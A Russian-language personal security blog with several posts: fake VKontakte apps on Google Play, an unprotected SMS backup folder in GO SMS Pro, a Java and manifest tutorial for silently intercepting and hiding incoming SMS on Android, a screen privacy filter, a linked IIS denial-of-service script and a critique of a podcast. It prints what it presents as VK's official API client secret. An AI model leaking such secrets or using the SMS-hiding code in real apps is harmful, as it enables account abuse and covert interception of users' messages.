Вконтакте, фейки, google play

Решила я на досуге полазить по google play, да поискать разнообразную молварь. Самое простое, что пришло в мою голову это поискать фейки на вконтакты. Все-таки на форумах постоянно продают эти аккаунты.

И, как оказалось, мои поиски были не напрасны. Фейки есть и много.
Что интересно, так они все используют токен и ид от оффициальной приложухи. Как же так, неужели вконтач никак не стал прятать их? Впрочем,так и есть, в течении 5 минут из декомпиленной прилы извлекаются. В их же документации к апи не рекомендуют хранить в открытом виде. Другим советуем, сами не следуем. Оставлю тут, может вконтач одумается, и если не начнет прятать, так хотябы регулярно менять client_id 2274003 client_secret hHbZxrka2uZ6jB1inYsH.

Не все разработчики используют токены от оф приложухи. Некоторые стесняются и делают хитрые конструкции в духе выбор рандомом — или оф приложуха или своя. Или же трай-катч: не прошло с нашим, пройдет с вкшным.

А теперь об интерфейсах. Один из разработчиков подошел с невероятным креативом и сделал почти oauth2, только вот слегка подозрительный oauth2

YhbpGJG5bWc

Приложения конечно же не обфусцированы. Код как под копирку, только аккаунты разработчиков разные, урл к фейку в открытом виде.

Кто захочет, может найти их все в маркете.

Похищение СМС

Есть такое приложение как GO SMS Pro. Описание приложения многообещающее — даже защита личных смс. Количество скачиваний более 50кк. Неплохо. Посмотрим насколько оно и правда защищает личные смс.

У приложения есть приватная папка, устанавливаем пас для доступа и перемещаем туда свои сокровенные смс. Пароль спрашивает, украсть смс стандарным способом не вышло (get sms android java, тыкаем на стековерфлоу и копируем код).
Приложение переодически делает бекап или ручками можно сделать. И получается, что все сокровенные и дорогие смс лежат в /sdcard/GOSMS/backup/SmsFolders/private/ файл db и текстовый файлик с расширением dat, в котором живет список номеров, которые отправляются в сокровенную папку. И да, никаких паролей не надо. Вуаля и сообщения не защищены.

Дальше нужно создать архив с содержимым этой папки и отправить к себе на сервер.

Такой вот он безопасный и секурный месенджер.

О Android, SMS и малвари

Одна из наиболее популярных возможностей вредоносного ПО под Android — перехват смс.

Прехватчик как сервис висит в фоне и осматривает все СМС. Если совпадает, например, текст сообщения, то эта смс не показывается пользователю. Приложение, перехватившее смс, может что-то с ним делать. Обычно или просто прячет от глаз пользователя или парсит.

Прехватчик состоит из 2 частей: код на java и запись в манифесте. В манифесте прописывается приоритет для перехватчика. У других приложений может быть другой приоритет — и если он ниже, чем у нас, мы можем перехватить сообщение. И наоборот — приложение с более высоким приоритетом может перехватить СМС до того как оно дойдет нам.
Такой перехватчки скроет от глаз пользователся все приходящие СМС с текстом «Hi»

public class MessageReceiver extends BroadcastReceiver {
public void onReceive(Context context, Intent intent) {
Bundle pudsBundle = intent.getExtras();
Object[] pdus = (Object[]) pudsBundle.get("pdus");
SmsMessage messages =SmsMessage.createFromPdu((byte[]) pdus[0]);
Log.i(TAG, messages.getMessageBody());
if(messages.getMessageBody().contains("Hi")) {
abortBroadcast(); //Вызов этой функции и не дает СМС уйти дальше нашего приложения
}
}

В манифест:

<receiver android:name=".SMSReceiver"
android:permission="android.permission.BROADCAST_SMS">
<intent-filter android:priority="999" %
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>


И конечно, прописать необходимые права:

<uses-permission android:name="android.permission.RECEIVE_SMS" />


Если выбрать приложением для СМС Hangouts, то перехватить СМС не получится. Точнее, приложение перехватчик получит свою СМС, но и Hangouts его получит и покажет пользователю. Hangouts обычно стоит по дефолту на телефоне и его нельзя удалить без рута.

У некоторых телефонов в стандартной прошивке его нет. На таких телефонах в маркете у Hangouts вместо кнопки «Установить» кнопка «Включить».

DQAnpx6WtoI

Жалюзи

Читая хабр наткнулась на жалюзи для дисплея. Суть в том, что видно происходящее на дисплее только под определенным углом.

1f9f8400573ebedf6ce32c822ae9ea8a







Инструкция по установке

DSC_0174






К сожалению в магазине не оказалось нужного размера (14 дюймов) и мне привезли 17. Пришлось его обрезать. Резала ножницами по металлу. Режется довольно легко. Из минусов то, что экран становится глянцевым, яркость чуть хуже становится. Мне удалось установить просто подсунув под пластмассовую рамку дисплея.

DSC_0176

How to DDOS-attack the IIS 7.5-8, Master Class by me

Как-то в вузе устраивали мероприятие по ИБ. У меня был доклад по DOS атаке. Девушка заливавшая видео слоупок, нуб и вообще не в теме происходящего.
Посему корректировки к описанию. Это не DDOS атака. Я пишу на С/C++, Perl (не для веба), Bash про php и ruby, веб сайты полный бред.
Да, я действительно student partner Microsoft.
смотреть с 4 минуты

скрипт из видео
https://www.dropbox.com/s/nyaorhyzgj8f65j/sieg.sh

Подкаст от антивир Касп.

Слушать.

Просматривая свою твиттер ленту, моё внимание сосредоточилось на записе с текстом, не буду говорить от кого, дабы не позорить:»Сергей Новиков из «Лаборатории Касперского» утверждает что Windows 7 гораздо безопаснее MacOS X и прочих Unix/Linux. <и ссылка на подкаст> «. Мне, как пользователю Linux, и человеку весьма повернутому на ИБ, стали интересны аргументы. Да-да, вдруг случилось то, что я пропустила.
Не могу не поделиться со своими читателями таким позитивным подкастом. Самая жара начинается с 15 минуты и сколько-то там секунд, забыла уже.
Поражает как такие люди могут работать в сфере ИБ. И весьма поразил аргумент про MacOS, что она не безопасна, ибо ПО с торентов. Про app store сие товарищ и не слышал. Конечно понятно, что это реклама их антивируса, но нельзя же до такого доходить.
Смешно до слёз.
Совет придумать один пароль и дописывать к нему название ресурса на котором он используется это пздц, иначе это никак не назвать.